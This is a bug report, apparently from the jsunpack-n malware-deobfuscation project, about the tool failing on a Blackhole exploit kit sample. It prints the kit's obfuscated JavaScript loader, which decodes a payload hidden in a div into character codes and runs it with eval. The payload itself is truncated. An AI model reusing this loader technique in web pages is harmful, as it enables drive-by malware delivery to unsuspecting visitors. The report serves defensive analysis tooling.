urule99 / jsunpack-n

Automatically exported from code.google.com/p/jsunpack-n
GNU General Public License v2.0
162 stars 65 forks source link

Div Obfuscation causes jsunpack to fail #23

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
Jsunpack is not able to handle the latest blackhole exploit kit which contains 
obfuscation within the div tags.

<html><body><style>#q{color:#fff;}</style><div id="q" 
style="display:block;">3320.........

<script>z=function(){c="";
d=11;
for(i=32478-1;i!=-1;i--){
    w=i;
    v=a[w];
    dd=32478-i-2+1;
    b=d;
    dd=dd-b*Math.floor(dd/d);
    k=v*1-(dd-13);
    kk=k;
    c+=f.fromCharCode(kk);
}
md="a";
try{prototype||123;}catch(dagdsg){if(020==0x10)eval(c);}}
if(window.document)for(i=0;i<document.body.childNodes.length;i++){
    if (document.body.childNodes[i].hasAttribute("style"))
        if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}
a=[];
for(i=0;i<g.length;i+=2){
    gg=g.substr(i,0x2);
    a.push(parseInt(gg,0x10));
}
try{fwq&prototype}catch(qwrwqr){
if(020==0x10){f=String;
}}
z();
        </script>

Attaching a sample file.

Original issue reported on code.google.com by rahulmoh...@gmail.com on 13 Aug 2012 at 6:16

Attachments:

GoogleCodeExporter commented 9 years ago
The div is properly parsed, the issue is the to 
document.body.childNodes[i].hasAttribute. I edited the javascript in the sample 
to prove this as follows:

//edit start

/*if(window.document)for(i=0;i<document.body.childNodes.length;i++){
    if (document.body.childNodes[i].hasAttribute("style"))
        if(z)g=document.body.childNodes[i].innerHTML.replace(/hwehes/g,"");
}*/

if(z)g=document.getElementById('q').innerHTML.replace(/hwehes/g,"");

//edit end

Please review the jsunpack submission here: 
http://jsunpack.jeek.org/?report=69829f230fea941b3e7d10ae8a6066baf2cea1b4

Original comment by urul...@gmail.com on 13 Aug 2012 at 2:00